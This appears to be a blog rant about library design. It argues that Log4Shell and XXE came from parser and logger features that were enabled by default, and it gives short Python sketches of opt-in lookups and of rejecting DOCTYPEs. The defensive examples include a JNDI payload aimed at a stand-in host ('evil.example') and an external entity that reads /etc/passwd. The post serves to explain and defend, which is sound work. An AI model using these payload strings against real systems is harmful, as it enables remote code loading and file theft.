Rantuary 15, 2023

Hello everybody. My nick is Fennix, I'm an app breaker by day and night. I might make this a daily thing, or I might do it every few days; I'm not sure yet.

For today's rant I want to talk about libraries, their developers, and when not applying the Unix philosophy goes terribly wrong.

I'm going to talk about Log4J but I'm also going to talk about things like XXE and in general design choices that lead to headaches.

When you're designing a library that is intended to tackle some important but common function, it's incredibly important that you keep the library as task-focused as possible, especially the core library and its defaults. If you need to extend functionality, use a pluggable architecture and make those plugins opt-in. The amount of headache that Log4J (really, the “log4shell” vulnerability) caused the world is wildly out of proportion to what everyone expected the library to do.
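To make "opt-in" concrete, here's a minimal sketch of what I mean. To be clear, this is not Log4J's API; `TinyLogger` and `register_lookup` are names I made up for illustration. The point is only that the core treats a log message as plain data, and any `${prefix:arg}` expansion happens only if the application explicitly registered a plugin for that prefix.

```python
import re


class TinyLogger:
    """Hypothetical logger: the core only records text, nothing more."""

    # Matches ${prefix:argument}; the syntax is an assumption for this sketch.
    _PATTERN = re.compile(r"\$\{(\w+):([^}]*)\}")

    def __init__(self):
        self.lines = []
        self._lookups = {}  # empty by default, so nothing gets expanded

    def register_lookup(self, prefix, func):
        """Opt in to expanding ${prefix:arg} by calling func(arg)."""
        self._lookups[prefix] = func

    def log(self, message):
        def expand(match):
            func = self._lookups.get(match.group(1))
            # No plugin registered for this prefix: keep the text verbatim.
            return func(match.group(2)) if func else match.group(0)

        self.lines.append(self._PATTERN.sub(expand, message))


# Default configuration: attacker-controlled text is stored, not interpreted.
log = TinyLogger()
log.log("user agent: ${jndi:ldap://evil.example/a}")

# A lookup only exists once the application asks for it by name.
opted_in = TinyLogger()
opted_in.register_lookup("upper", str.upper)
opted_in.log("hello ${upper:world}")
```

With this shape, the dangerous behaviour is something a developer has to go looking for, instead of something they have to know to switch off.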

What users expect the library to be doing matters, and Log4J is not alone in ignoring that. The log4shell vulnerability is very reminiscent to me of XXE: a feature that was enabled by default to do some additional parsing that most of its users didn't want or need, and that they didn't necessarily have visibility into.

Along those lines, if you're not familiar with XXE, AKA XML External Entity parsing attacks, the basics of the attack are this:

– Attacker submits XML to server
– Server parses XML
– Server does a bunch of stupid shit like opening remote connections and sending files
– Attacker laughs, possibly even a good cackle

When XML was being ratified as a document standard, importance was placed on being able to validate the document against an arbitrary schema in order to make it flexible. It was important that schema specifications could be loaded not just from local files but also from central locations using a variety of different protocols. Examples of these are Gopher, FTP, or HTTP. XML is very old (the 1.0 spec dates to 1998, and its SGML ancestry goes back further).

Secondly, in XML there is this concept of entities: a shorthand within the document so that you can refer to some special character or a predefined standard blurb. You have likely seen these; the &copy; that you would use to insert a copyright symbol in an older HTML doc is an entity (HTML and XML share their roots in SGML). When you combine these two things, it meant that you could have remotely loadable entities that would get fetched and parsed on the machine that was processing the document.

Now because you might have some rather large entity, perhaps some boilerplate legalese that needs to be attached to each document, you might want to load that out of a local text file. You might make &legalese; into an entity that reads its data from /usr/lib/standard_disclaimer.txt.
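Here's a small sketch of what that looks like from the parser's side, using Python's standard `xml.parsers.expat` module. The document and the `memo` element are made up; the path is the one from the paragraph above. Nothing gets opened here: the handlers only write down what the parser asks for, which is exactly the decision an attacker would love your library to make for you.

```python
from xml.parsers import expat

# Hypothetical document that declares &legalese; as an external entity.
DOC = b"""<?xml version="1.0"?>
<!DOCTYPE memo [
  <!ENTITY legalese SYSTEM "/usr/lib/standard_disclaimer.txt">
]>
<memo>&legalese;</memo>"""

declared = {}   # entity name -> system identifier taken from the DTD
requested = []  # system identifiers the parser asked the application to fetch


def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
    # Called once for each <!ENTITY ...> declaration in the DTD.
    declared[name] = system_id


def on_external_ref(context, base, system_id, public_id):
    # A real resolver would open system_id here; this one only takes notes.
    requested.append(system_id)
    return 1  # non-zero tells expat to carry on parsing


parser = expat.ParserCreate()
parser.EntityDeclHandler = on_entity_decl
parser.ExternalEntityRefHandler = on_external_ref
parser.Parse(DOC, True)
```

After the parse, both `declared` and `requested` point at the file path the document supplied. Swap that path for `/etc/passwd` or an internal URL and you can see where this is going.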

The document processor went from simple and focused to unfocused. Because of these features, you can probably see how XXE often lets an attacker steal the contents of files, reveal remote server locations, perform SSRF, cause a denial of service, etc., purely because this specification became overly complicated.

It was then made worse by the fact that as the web was evolving, for a long time nobody had a better answer than XML for online document exchange. Since it was already a standard in business, it had the inertia, and so there was no reason to change this. Ultimately you end up with major websites being vulnerable to all manner of XXE attacks purely because support for some long-forgotten feature was thrown in there. Even today this happens.

Enter the developer using it: “It's not clear that this needs to be turned off, I just wanted to parse an XML document! They don't make any mention of this sort of thing anywhere in the documentation, so why would I think it's by nature unsafe?!”
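For what it's worth, "turning it off" can be as blunt as refusing any document that shows up with its own DOCTYPE. Below is one possible sketch using Python's standard `xml.parsers.expat`; `DoctypeForbidden` and `element_names` are names I invented for the example, and other parsers expose their own switches for this, so treat it as an illustration of the idea and not as the one true fix.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML tries to bring its own DTD."""


def element_names(data):
    """Return element names in document order, refusing any DOCTYPE."""
    names = []

    def refuse(name, system_id, public_id, has_internal_subset):
        # No DOCTYPE means no entity declarations, so no external entities.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = refuse
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


# An ordinary document parses as usual.
plain = element_names(b"<order><item/></order>")

# A document carrying an external entity is rejected before it is expanded.
hostile = b'<!DOCTYPE x [<!ENTITY e SYSTEM "/etc/passwd">]><x>&e;</x>'
try:
    element_names(hostile)
    blocked = False
except DoctypeForbidden:
    blocked = True
```

That's a dozen lines that the developer who "just wanted to parse an XML document" had no way of knowing they needed.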

This is horse shit. We should expect better from our library authors. We should expect better from commonly used components. Importantly, all the billion-dollar corporations that make much of their billions leveraging this kind of software need to pony up: fund some pentests for these things, fund developer education, and dedicate some resources to it.